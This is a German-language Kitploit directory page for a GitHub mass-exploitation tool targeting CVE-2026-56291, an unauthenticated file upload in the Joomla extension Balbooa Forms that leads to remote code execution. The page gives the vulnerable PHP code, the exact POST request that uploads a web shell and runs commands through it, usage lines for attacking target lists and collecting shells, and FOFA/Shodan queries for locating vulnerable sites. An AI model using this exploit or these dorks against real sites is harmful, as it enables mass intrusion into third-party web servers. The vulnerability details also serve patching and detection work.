Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — Nicht authentifizierter Dateiupload zu RCE über form.uploadAttachmentFile | CVSS 9.8 | CISA KEV | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-56291
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — Nicht authentifizierter Dateiupload zu RCE über form.uploadAttachmentFile | CVSS 9.8 | CISA KEV

Repository anzeigen
22vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-56291 – Balbooa Forms Joomla Massen-RCE-Exploit

Pre-Auth form.uploadAttachmentFile → Kein CSRF → PHP-Upload


Übersicht

CVE-2026-56291 ist eine kritische (CVSS 9.8) Schwachstelle für nicht authentifizierte, beliebige Datei-Uploads in der Joomla-Erweiterung Balbooa Forms (com_baforms) (< 2.4.1).

Die Frontend-Task form.uploadAttachmentFile ruft Session::checkToken() nicht auf und führt keinerlei Berechtigungsprüfung durch. Hochgeladene Dateien verwenden direkt die Erweiterung des Angreifers: . Die Dateien landen in – direkt als PHP ausführbar.

$fileName = $name . '.' . $ext
images/baforms/uploads/form-{id}/

Betroffene Versionen

VersionStatus
1.0 – 2.4.0Verwundbar
2.4.1+Behoben

CISA KEV: Am 10. Juli 2026 hinzugefügt – aktive Ausnutzung bestätigt.


Mechanismus der Schwachstelle

Grundursache

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

Angriffsablauf

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

Verwendung

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

Referenzen

RessourceLink
CISA KEVcisa.gov/known-exploited-vulnerabilities
Details zum Fixmysites.guru
ForscherPhil Taylor

Nicht mit Balbooa verbunden.

Tool herunterladen